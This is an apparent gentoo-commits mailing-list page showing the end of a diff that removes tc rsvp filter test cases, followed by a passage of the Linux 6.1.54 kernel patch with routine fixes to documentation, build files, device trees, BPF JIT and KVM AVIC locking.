+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto udp session 1.1.1.1",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "^filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh 0x.*session 1.1.1.1 ipproto udp",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "2819",
+-        "name": "Add rsvp filter with src ip and src port",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto udp session 1.1.1.1 sender 2.2.2.2/5021 classid 1:1",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "^filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh 0x.*flowid 1:1 session 1.1.1.1 ipproto udp sender  2.2.2.2/5021",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "c967",
+-        "name": "Add rsvp filter with tunnelid and continue action",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto udp session 1.1.1.1 tunnelid 2 classid 1:1 action continue",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "^filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh 0x.*flowid 1:1 session 1.1.1.1 ipproto udp tunnelid 2.*action order [0-9]+: gact action continue",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "5463",
+-        "name": "Add rsvp filter with tunnel and pipe action",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto udp session 1.1.1.1 tunnel 2 skip 1 action pipe",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "^filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh 0x.*tunnel 2 skip 1 session 1.1.1.1 ipproto udp.*action order [0-9]+: gact action pipe",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "2332",
+-        "name": "Add rsvp filter with miltiple actions",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: protocol ip prio 7 rsvp ipproto udp session 1.1.1.1 classid 1:1 action skbedit mark 7 pipe action gact drop",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "^filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh 0x.*flowid 1:1 session 1.1.1.1 ipproto udp.*action order [0-9]+: skbedit  mark 7 pipe.*action order [0-9]+: gact action drop",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "8879",
+-        "name": "Add rsvp filter with tunnel and skp flag",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto udp session 1.1.1.1 tunnel 2 skip 1 action pipe",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "^filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh 0x.*tunnel 2 skip 1 session 1.1.1.1 ipproto udp.*action order [0-9]+: gact action pipe",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "8261",
+-        "name": "List rsvp filters",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto udp session 1.1.1.1/1234 classid 1:1",
+-            "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto tcp session 2.2.2.2/1234 classid 2:1"
+-        ],
+-        "cmdUnderTest": "$TC filter show dev $DEV1 parent ffff:",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "^filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh",
+-        "matchCount": "2",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "8989",
+-        "name": "Delete rsvp filter",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto udp session 1.1.1.1/1234 tunnelid 9 classid 2:1"
+-        ],
+-        "cmdUnderTest": "$TC filter del dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto udp session 1.1.1.1/1234 tunnelid 9 classid 2:1",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh 0x.*flowid 2:1 session 1.1.1.1/1234 ipproto udp tunnelid 9",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    }
+-]


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-09-19 13:20 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-09-19 13:20 UTC (permalink / raw
  To: gentoo-commits

commit:     9a50b678865dec6622e41a9481b900772b15b8a2
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue Sep 19 13:19:57 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue Sep 19 13:19:57 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=9a50b678

Linux patch 6.1.54

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1053_linux-6.1.54.patch | 9258 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 9262 insertions(+)

diff --git a/0000_README b/0000_README
index e0a65c77..e831e898 100644
--- a/0000_README
+++ b/0000_README
@@ -255,6 +255,10 @@ Patch:  1052_linux-6.1.53.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.53
 
+Patch:  1053_linux-6.1.54.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.54
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1053_linux-6.1.54.patch b/1053_linux-6.1.54.patch
new file mode 100644
index 00000000..7f7a5319
--- /dev/null
+++ b/1053_linux-6.1.54.patch
@@ -0,0 +1,9258 @@
+diff --git a/Documentation/admin-guide/cgroup-v1/memory.rst b/Documentation/admin-guide/cgroup-v1/memory.rst
+index 2524061836acc..34911ce5e4b50 100644
+--- a/Documentation/admin-guide/cgroup-v1/memory.rst
++++ b/Documentation/admin-guide/cgroup-v1/memory.rst
+@@ -91,8 +91,6 @@ Brief summary of control files.
+  memory.oom_control		     set/show oom controls.
+  memory.numa_stat		     show the number of memory usage per numa
+ 				     node
+- memory.kmem.limit_in_bytes          This knob is deprecated and writing to
+-                                     it will return -ENOTSUPP.
+  memory.kmem.usage_in_bytes          show current kernel memory allocation
+  memory.kmem.failcnt                 show the number of kernel memory usage
+ 				     hits limits
+diff --git a/Documentation/devicetree/bindings/clock/xlnx,versal-clk.yaml b/Documentation/devicetree/bindings/clock/xlnx,versal-clk.yaml
+index 229af98b1d305..7cd88bc3a67d7 100644
+--- a/Documentation/devicetree/bindings/clock/xlnx,versal-clk.yaml
++++ b/Documentation/devicetree/bindings/clock/xlnx,versal-clk.yaml
+@@ -16,8 +16,6 @@ description: |
+   reads required input clock frequencies from the devicetree and acts as clock
+   provider for all clock consumers of PS clocks.
+ 
+-select: false
+-
+ properties:
+   compatible:
+     const: xlnx,versal-clk
+diff --git a/Documentation/mm/multigen_lru.rst b/Documentation/mm/multigen_lru.rst
+index d7062c6a89464..d8f721f98868a 100644
+--- a/Documentation/mm/multigen_lru.rst
++++ b/Documentation/mm/multigen_lru.rst
+@@ -89,15 +89,15 @@ variables are monotonically increasing.
+ 
+ Generation numbers are truncated into ``order_base_2(MAX_NR_GENS+1)``
+ bits in order to fit into the gen counter in ``folio->flags``. Each
+-truncated generation number is an index to ``lrugen->lists[]``. The
++truncated generation number is an index to ``lrugen->folios[]``. The
+ sliding window technique is used to track at least ``MIN_NR_GENS`` and
+ at most ``MAX_NR_GENS`` generations. The gen counter stores a value
+ within ``[1, MAX_NR_GENS]`` while a page is on one of
+-``lrugen->lists[]``; otherwise it stores zero.
++``lrugen->folios[]``; otherwise it stores zero.
+ 
+ Each generation is divided into multiple tiers. A page accessed ``N``
+ times through file descriptors is in tier ``order_base_2(N)``. Unlike
+-generations, tiers do not have dedicated ``lrugen->lists[]``. In
++generations, tiers do not have dedicated ``lrugen->folios[]``. In
+ contrast to moving across generations, which requires the LRU lock,
+ moving across tiers only involves atomic operations on
+ ``folio->flags`` and therefore has a negligible cost. A feedback loop
+@@ -127,7 +127,7 @@ page mapped by this PTE to ``(max_seq%MAX_NR_GENS)+1``.
+ Eviction
+ --------
+ The eviction consumes old generations. Given an ``lruvec``, it
+-increments ``min_seq`` when ``lrugen->lists[]`` indexed by
++increments ``min_seq`` when ``lrugen->folios[]`` indexed by
+ ``min_seq%MAX_NR_GENS`` becomes empty. To select a type and a tier to
+ evict from, it first compares ``min_seq[]`` to select the older type.
+ If both types are equally old, it selects the one whose first tier has
+diff --git a/Makefile b/Makefile
+index 35fc0d62898dc..844afa653fdda 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 53
++SUBLEVEL = 54
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+@@ -1939,7 +1939,9 @@ quiet_cmd_depmod = DEPMOD  $(MODLIB)
+ 
+ modules_install:
+ 	$(Q)$(MAKE) -f $(srctree)/scripts/Makefile.modinst
++ifndef modules_sign_only
+ 	$(call cmd,depmod)
++endif
+ 
+ else # CONFIG_MODULES
+ 
+diff --git a/arch/arc/include/asm/atomic-llsc.h b/arch/arc/include/asm/atomic-llsc.h
+index 1b0ffaeee16d0..5258cb81a16b4 100644
+--- a/arch/arc/include/asm/atomic-llsc.h
++++ b/arch/arc/include/asm/atomic-llsc.h
+@@ -18,7 +18,7 @@ static inline void arch_atomic_##op(int i, atomic_t *v)			\
+ 	: [val]	"=&r"	(val) /* Early clobber to prevent reg reuse */	\
+ 	: [ctr]	"r"	(&v->counter), /* Not "m": llock only supports reg direct addr mode */	\
+ 	  [i]	"ir"	(i)						\
+-	: "cc");							\
++	: "cc", "memory");						\
+ }									\
+ 
+ #define ATOMIC_OP_RETURN(op, asm_op)				\
+@@ -34,7 +34,7 @@ static inline int arch_atomic_##op##_return_relaxed(int i, atomic_t *v)	\
+ 	: [val]	"=&r"	(val)						\
+ 	: [ctr]	"r"	(&v->counter),					\
+ 	  [i]	"ir"	(i)						\
+-	: "cc");							\
++	: "cc", "memory");						\
+ 									\
+ 	return val;							\
+ }
+@@ -56,7 +56,7 @@ static inline int arch_atomic_fetch_##op##_relaxed(int i, atomic_t *v)	\
+ 	  [orig] "=&r" (orig)						\
+ 	: [ctr]	"r"	(&v->counter),					\
+ 	  [i]	"ir"	(i)						\
+-	: "cc");							\
++	: "cc", "memory");						\
+ 									\
+ 	return orig;							\
+ }
+diff --git a/arch/arc/include/asm/atomic64-arcv2.h b/arch/arc/include/asm/atomic64-arcv2.h
+index c5a8010fdc97d..9089f34baac3b 100644
+--- a/arch/arc/include/asm/atomic64-arcv2.h
++++ b/arch/arc/include/asm/atomic64-arcv2.h
+@@ -60,7 +60,7 @@ static inline void arch_atomic64_##op(s64 a, atomic64_t *v)		\
+ 	"	bnz     1b		\n"				\
+ 	: "=&r"(val)							\
+ 	: "r"(&v->counter), "ir"(a)					\
+-	: "cc");							\
++	: "cc", "memory");						\
+ }									\
+ 
+ #define ATOMIC64_OP_RETURN(op, op1, op2)		        	\
+@@ -77,7 +77,7 @@ static inline s64 arch_atomic64_##op##_return_relaxed(s64 a, atomic64_t *v)	\
+ 	"	bnz     1b		\n"				\
+ 	: [val] "=&r"(val)						\
+ 	: "r"(&v->counter), "ir"(a)					\
+-	: "cc");	/* memory clobber comes from smp_mb() */	\
++	: "cc", "memory");						\
+ 									\
+ 	return val;							\
+ }
+@@ -99,7 +99,7 @@ static inline s64 arch_atomic64_fetch_##op##_relaxed(s64 a, atomic64_t *v)	\
+ 	"	bnz     1b		\n"				\
+ 	: "=&r"(orig), "=&r"(val)					\
+ 	: "r"(&v->counter), "ir"(a)					\
+-	: "cc");	/* memory clobber comes from smp_mb() */	\
++	: "cc", "memory");						\
+ 									\
+ 	return orig;							\
+ }
+diff --git a/arch/arm64/boot/dts/renesas/rzg2l-smarc-som.dtsi b/arch/arm64/boot/dts/renesas/rzg2l-smarc-som.dtsi
+index c4faff0923800..fee53c25fc808 100644
+--- a/arch/arm64/boot/dts/renesas/rzg2l-smarc-som.dtsi
++++ b/arch/arm64/boot/dts/renesas/rzg2l-smarc-som.dtsi
+@@ -100,7 +100,7 @@
+ 		rxc-skew-psec = <2400>;
+ 		txc-skew-psec = <2400>;
+ 		rxdv-skew-psec = <0>;
+-		txdv-skew-psec = <0>;
++		txen-skew-psec = <0>;
+ 		rxd0-skew-psec = <0>;
+ 		rxd1-skew-psec = <0>;
+ 		rxd2-skew-psec = <0>;
+@@ -128,7 +128,7 @@
+ 		rxc-skew-psec = <2400>;
+ 		txc-skew-psec = <2400>;
+ 		rxdv-skew-psec = <0>;
+-		txdv-skew-psec = <0>;
++		txen-skew-psec = <0>;
+ 		rxd0-skew-psec = <0>;
+ 		rxd1-skew-psec = <0>;
+ 		rxd2-skew-psec = <0>;
+diff --git a/arch/arm64/boot/dts/renesas/rzg2lc-smarc-som.dtsi b/arch/arm64/boot/dts/renesas/rzg2lc-smarc-som.dtsi
+index 78e6e2376b015..5ff66aa6f8ba4 100644
+--- a/arch/arm64/boot/dts/renesas/rzg2lc-smarc-som.dtsi
++++ b/arch/arm64/boot/dts/renesas/rzg2lc-smarc-som.dtsi
+@@ -77,7 +77,7 @@
+ 		rxc-skew-psec = <2400>;
+ 		txc-skew-psec = <2400>;
+ 		rxdv-skew-psec = <0>;
+-		txdv-skew-psec = <0>;
++		txen-skew-psec = <0>;
+ 		rxd0-skew-psec = <0>;
+ 		rxd1-skew-psec = <0>;
+ 		rxd2-skew-psec = <0>;
+diff --git a/arch/arm64/boot/dts/renesas/rzg2ul-smarc-som.dtsi b/arch/arm64/boot/dts/renesas/rzg2ul-smarc-som.dtsi
+index 2a0feb53f0dcb..b62973bc2f0dd 100644
+--- a/arch/arm64/boot/dts/renesas/rzg2ul-smarc-som.dtsi
++++ b/arch/arm64/boot/dts/renesas/rzg2ul-smarc-som.dtsi
+@@ -80,7 +80,7 @@
+ 		rxc-skew-psec = <2400>;
+ 		txc-skew-psec = <2400>;
+ 		rxdv-skew-psec = <0>;
+-		txdv-skew-psec = <0>;
++		txen-skew-psec = <0>;
+ 		rxd0-skew-psec = <0>;
+ 		rxd1-skew-psec = <0>;
+ 		rxd2-skew-psec = <0>;
+@@ -107,7 +107,7 @@
+ 		rxc-skew-psec = <2400>;
+ 		txc-skew-psec = <2400>;
+ 		rxdv-skew-psec = <0>;
+-		txdv-skew-psec = <0>;
++		txen-skew-psec = <0>;
+ 		rxd0-skew-psec = <0>;
+ 		rxd1-skew-psec = <0>;
+ 		rxd2-skew-psec = <0>;
+diff --git a/arch/arm64/net/bpf_jit_comp.c b/arch/arm64/net/bpf_jit_comp.c
+index 14134fd34ff79..0ce5f13eabb1b 100644
+--- a/arch/arm64/net/bpf_jit_comp.c
++++ b/arch/arm64/net/bpf_jit_comp.c
+@@ -1655,13 +1655,8 @@ static void invoke_bpf_prog(struct jit_ctx *ctx, struct bpf_tramp_link *l,
+ 	struct bpf_prog *p = l->link.prog;
+ 	int cookie_off = offsetof(struct bpf_tramp_run_ctx, bpf_cookie);
+ 
+-	if (p->aux->sleepable) {
+-		enter_prog = (u64)__bpf_prog_enter_sleepable;
+-		exit_prog = (u64)__bpf_prog_exit_sleepable;
+-	} else {
+-		enter_prog = (u64)__bpf_prog_enter;
+-		exit_prog = (u64)__bpf_prog_exit;
+-	}
++	enter_prog = (u64)bpf_trampoline_enter(p);
++	exit_prog = (u64)bpf_trampoline_exit(p);
+ 
+ 	if (l->cookie == 0) {
+ 		/* if cookie is zero, one instruction is enough to store it */
+diff --git a/arch/mips/Makefile b/arch/mips/Makefile
+index fe64ad43ba882..ee8f47aef98b3 100644
+--- a/arch/mips/Makefile
++++ b/arch/mips/Makefile
+@@ -308,8 +308,8 @@ ifdef CONFIG_64BIT
+     endif
+   endif
+ 
+-  ifeq ($(KBUILD_SYM32)$(call cc-option-yn,-msym32), yy)
+-    cflags-y += -msym32 -DKBUILD_64BIT_SYM32
++  ifeq ($(KBUILD_SYM32), y)
++    cflags-$(KBUILD_SYM32) += -msym32 -DKBUILD_64BIT_SYM32
+   else
+     ifeq ($(CONFIG_CPU_DADDI_WORKAROUNDS), y)
+       $(error CONFIG_CPU_DADDI_WORKAROUNDS unsupported without -msym32)
+@@ -350,7 +350,7 @@ KBUILD_CFLAGS += -fno-asynchronous-unwind-tables
+ 
+ KBUILD_LDFLAGS		+= -m $(ld-emul)
+ 
+-ifdef CONFIG_MIPS
++ifdef need-compiler
+ CHECKFLAGS += $(shell $(CC) $(KBUILD_CFLAGS) -dM -E -x c /dev/null | \
+ 	egrep -vw '__GNUC_(MINOR_|PATCHLEVEL_)?_' | \
+ 	sed -e "s/^\#define /-D'/" -e "s/ /'='/" -e "s/$$/'/" -e 's/\$$/&&/g')
+diff --git a/arch/parisc/include/asm/led.h b/arch/parisc/include/asm/led.h
+index 6de13d08a3886..b70b9094fb7cd 100644
+--- a/arch/parisc/include/asm/led.h
++++ b/arch/parisc/include/asm/led.h
+@@ -11,8 +11,8 @@
+ #define	LED1		0x02
+ #define	LED0		0x01		/* bottom (or furthest left) LED */
+ 
+-#define	LED_LAN_TX	LED0		/* for LAN transmit activity */
+-#define	LED_LAN_RCV	LED1		/* for LAN receive activity */
++#define	LED_LAN_RCV	LED0		/* for LAN receive activity */
++#define	LED_LAN_TX	LED1		/* for LAN transmit activity */
+ #define	LED_DISK_IO	LED2		/* for disk activity */
+ #define	LED_HEARTBEAT	LED3		/* heartbeat */
+ 
+diff --git a/arch/sh/boards/mach-ap325rxa/setup.c b/arch/sh/boards/mach-ap325rxa/setup.c
+index c77b5f00a66a3..d8f8dca4d7968 100644
+--- a/arch/sh/boards/mach-ap325rxa/setup.c
++++ b/arch/sh/boards/mach-ap325rxa/setup.c
+@@ -530,7 +530,7 @@ static int __init ap325rxa_devices_setup(void)
+ 	device_initialize(&ap325rxa_ceu_device.dev);
+ 	dma_declare_coherent_memory(&ap325rxa_ceu_device.dev,
+ 			ceu_dma_membase, ceu_dma_membase,
+-			ceu_dma_membase + CEU_BUFFER_MEMORY_SIZE - 1);
++			CEU_BUFFER_MEMORY_SIZE);
+ 
+ 	platform_device_add(&ap325rxa_ceu_device);
+ 
+diff --git a/arch/sh/boards/mach-ecovec24/setup.c b/arch/sh/boards/mach-ecovec24/setup.c
+index 674da7ebd8b7f..7ec03d4a4edf0 100644
+--- a/arch/sh/boards/mach-ecovec24/setup.c
++++ b/arch/sh/boards/mach-ecovec24/setup.c
+@@ -1454,15 +1454,13 @@ static int __init arch_setup(void)
+ 	device_initialize(&ecovec_ceu_devices[0]->dev);
+ 	dma_declare_coherent_memory(&ecovec_ceu_devices[0]->dev,
+ 				    ceu0_dma_membase, ceu0_dma_membase,
+-				    ceu0_dma_membase +
+-				    CEU_BUFFER_MEMORY_SIZE - 1);
++				    CEU_BUFFER_MEMORY_SIZE);
+ 	platform_device_add(ecovec_ceu_devices[0]);
+ 
+ 	device_initialize(&ecovec_ceu_devices[1]->dev);
+ 	dma_declare_coherent_memory(&ecovec_ceu_devices[1]->dev,
+ 				    ceu1_dma_membase, ceu1_dma_membase,
+-				    ceu1_dma_membase +
+-				    CEU_BUFFER_MEMORY_SIZE - 1);
++				    CEU_BUFFER_MEMORY_SIZE);
+ 	platform_device_add(ecovec_ceu_devices[1]);
+ 
+ 	gpiod_add_lookup_table(&cn12_power_gpiod_table);
+diff --git a/arch/sh/boards/mach-kfr2r09/setup.c b/arch/sh/boards/mach-kfr2r09/setup.c
+index 20f4db778ed6a..c6d556dfbbbe6 100644
+--- a/arch/sh/boards/mach-kfr2r09/setup.c
++++ b/arch/sh/boards/mach-kfr2r09/setup.c
+@@ -603,7 +603,7 @@ static int __init kfr2r09_devices_setup(void)
+ 	device_initialize(&kfr2r09_ceu_device.dev);
+ 	dma_declare_coherent_memory(&kfr2r09_ceu_device.dev,
+ 			ceu_dma_membase, ceu_dma_membase,
+-			ceu_dma_membase + CEU_BUFFER_MEMORY_SIZE - 1);
++			CEU_BUFFER_MEMORY_SIZE);
+ 
+ 	platform_device_add(&kfr2r09_ceu_device);
+ 
+diff --git a/arch/sh/boards/mach-migor/setup.c b/arch/sh/boards/mach-migor/setup.c
+index f60061283c482..773ee767d0c4e 100644
+--- a/arch/sh/boards/mach-migor/setup.c
++++ b/arch/sh/boards/mach-migor/setup.c
+@@ -604,7 +604,7 @@ static int __init migor_devices_setup(void)
+ 	device_initialize(&migor_ceu_device.dev);
+ 	dma_declare_coherent_memory(&migor_ceu_device.dev,
+ 			ceu_dma_membase, ceu_dma_membase,
+-			ceu_dma_membase + CEU_BUFFER_MEMORY_SIZE - 1);
++			CEU_BUFFER_MEMORY_SIZE);
+ 
+ 	platform_device_add(&migor_ceu_device);
+ 
+diff --git a/arch/sh/boards/mach-se/7724/setup.c b/arch/sh/boards/mach-se/7724/setup.c
+index b60a2626e18b2..6495f93540654 100644
+--- a/arch/sh/boards/mach-se/7724/setup.c
++++ b/arch/sh/boards/mach-se/7724/setup.c
+@@ -940,15 +940,13 @@ static int __init devices_setup(void)
+ 	device_initialize(&ms7724se_ceu_devices[0]->dev);
+ 	dma_declare_coherent_memory(&ms7724se_ceu_devices[0]->dev,
+ 				    ceu0_dma_membase, ceu0_dma_membase,
+-				    ceu0_dma_membase +
+-				    CEU_BUFFER_MEMORY_SIZE - 1);
++				    CEU_BUFFER_MEMORY_SIZE);
+ 	platform_device_add(ms7724se_ceu_devices[0]);
+ 
+ 	device_initialize(&ms7724se_ceu_devices[1]->dev);
+ 	dma_declare_coherent_memory(&ms7724se_ceu_devices[1]->dev,
+ 				    ceu1_dma_membase, ceu1_dma_membase,
+-				    ceu1_dma_membase +
+-				    CEU_BUFFER_MEMORY_SIZE - 1);
++				    CEU_BUFFER_MEMORY_SIZE);
+ 	platform_device_add(ms7724se_ceu_devices[1]);
+ 
+ 	return platform_add_devices(ms7724se_devices,
+diff --git a/arch/x86/include/asm/virtext.h b/arch/x86/include/asm/virtext.h
+index 3b12e6b994123..6c2e3ff3cb28f 100644
+--- a/arch/x86/include/asm/virtext.h
++++ b/arch/x86/include/asm/virtext.h
+@@ -101,12 +101,6 @@ static inline int cpu_has_svm(const char **msg)
+ 		return 0;
+ 	}
+ 
+-	if (boot_cpu_data.extended_cpuid_level < SVM_CPUID_FUNC) {
+-		if (msg)
+-			*msg = "can't execute cpuid_8000000a";
+-		return 0;
+-	}
+-
+ 	if (!boot_cpu_has(X86_FEATURE_SVM)) {
+ 		if (msg)
+ 			*msg = "svm not available";
+diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
+index e910ec5a0cc0b..d3e66740c7c68 100644
+--- a/arch/x86/kvm/svm/avic.c
++++ b/arch/x86/kvm/svm/avic.c
+@@ -810,6 +810,7 @@ static int svm_ir_list_add(struct vcpu_svm *svm, struct amd_iommu_pi_data *pi)
+ 	int ret = 0;
+ 	unsigned long flags;
+ 	struct amd_svm_iommu_ir *ir;
++	u64 entry;
+ 
+ 	/**
+ 	 * In some cases, the existing irte is updated and re-set,
+@@ -843,6 +844,18 @@ static int svm_ir_list_add(struct vcpu_svm *svm, struct amd_iommu_pi_data *pi)
+ 	ir->data = pi->ir_data;
+ 
+ 	spin_lock_irqsave(&svm->ir_list_lock, flags);
++
++	/*
++	 * Update the target pCPU for IOMMU doorbells if the vCPU is running.
++	 * If the vCPU is NOT running, i.e. is blocking or scheduled out, KVM
++	 * will update the pCPU info when the vCPU awkened and/or scheduled in.
++	 * See also avic_vcpu_load().
++	 */
++	entry = READ_ONCE(*(svm->avic_physical_id_cache));
++	if (entry & AVIC_PHYSICAL_ID_ENTRY_IS_RUNNING_MASK)
++		amd_iommu_update_ga(entry & AVIC_PHYSICAL_ID_ENTRY_HOST_PHYSICAL_ID_MASK,
++				    true, pi->ir_data);
++
+ 	list_add(&ir->node, &svm->ir_list);
+ 	spin_unlock_irqrestore(&svm->ir_list_lock, flags);
+ out:
+@@ -1022,10 +1035,11 @@ static inline int
+ avic_update_iommu_vcpu_affinity(struct kvm_vcpu *vcpu, int cpu, bool r)
+ {
+ 	int ret = 0;
+-	unsigned long flags;
+ 	struct amd_svm_iommu_ir *ir;
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+ 
++	lockdep_assert_held(&svm->ir_list_lock);
++
+ 	if (!kvm_arch_has_assigned_device(vcpu->kvm))
+ 		return 0;
+ 
+@@ -1033,19 +1047,15 @@ avic_update_iommu_vcpu_affinity(struct kvm_vcpu *vcpu, int cpu, bool r)
+ 	 * Here, we go through the per-vcpu ir_list to update all existing
+ 	 * interrupt remapping table entry targeting this vcpu.
+ 	 */
+-	spin_lock_irqsave(&svm->ir_list_lock, flags);
+-
+ 	if (list_empty(&svm->ir_list))
+-		goto out;
++		return 0;
+ 
+ 	list_for_each_entry(ir, &svm->ir_list, node) {
+ 		ret = amd_iommu_update_ga(cpu, r, ir->data);
+ 		if (ret)
+-			break;
++			return ret;
+ 	}
+-out:
+-	spin_unlock_irqrestore(&svm->ir_list_lock, flags);
+-	return ret;
++	return 0;
+ }
+ 
+ void avic_vcpu_load(struct kvm_vcpu *vcpu, int cpu)
+@@ -1053,6 +1063,7 @@ void avic_vcpu_load(struct kvm_vcpu *vcpu, int cpu)
+ 	u64 entry;
+ 	int h_physical_id = kvm_cpu_get_apicid(cpu);
+ 	struct vcpu_svm *svm = to_svm(vcpu);
++	unsigned long flags;
+ 
+ 	lockdep_assert_preemption_disabled();
+ 
+@@ -1069,6 +1080,15 @@ void avic_vcpu_load(struct kvm_vcpu *vcpu, int cpu)
+ 	if (kvm_vcpu_is_blocking(vcpu))
+ 		return;
+ 
++	/*
++	 * Grab the per-vCPU interrupt remapping lock even if the VM doesn't
++	 * _currently_ have assigned devices, as that can change.  Holding
++	 * ir_list_lock ensures that either svm_ir_list_add() will consume
++	 * up-to-date entry information, or that this task will wait until
++	 * svm_ir_list_add() completes to set the new target pCPU.
++	 */
++	spin_lock_irqsave(&svm->ir_list_lock, flags);
++
+ 	entry = READ_ONCE(*(svm->avic_physical_id_cache));
+ 
+ 	entry &= ~AVIC_PHYSICAL_ID_ENTRY_HOST_PHYSICAL_ID_MASK;
+@@ -1077,25 +1097,48 @@ void avic_vcpu_load(struct kvm_vcpu *vcpu, int cpu)
+ 
+ 	WRITE_ONCE(*(svm->avic_physical_id_cache), entry);
+ 	avic_update_iommu_vcpu_affinity(vcpu, h_physical_id, true);
++
++	spin_unlock_irqrestore(&svm->ir_list_lock, flags);
+ }
+ 
+ void avic_vcpu_put(struct kvm_vcpu *vcpu)
+ {
+ 	u64 entry;
+ 	struct vcpu_svm *svm = to_svm(vcpu);
++	unsigned long flags;
+ 
+ 	lockdep_assert_preemption_disabled();
+ 
++	/*
++	 * Note, reading the Physical ID entry outside of ir_list_lock is safe
++	 * as only the pCPU that has loaded (or is loading) the vCPU is allowed
++	 * to modify the entry, and preemption is disabled.  I.e. the vCPU
++	 * can't be scheduled out and thus avic_vcpu_{put,load}() can't run
++	 * recursively.
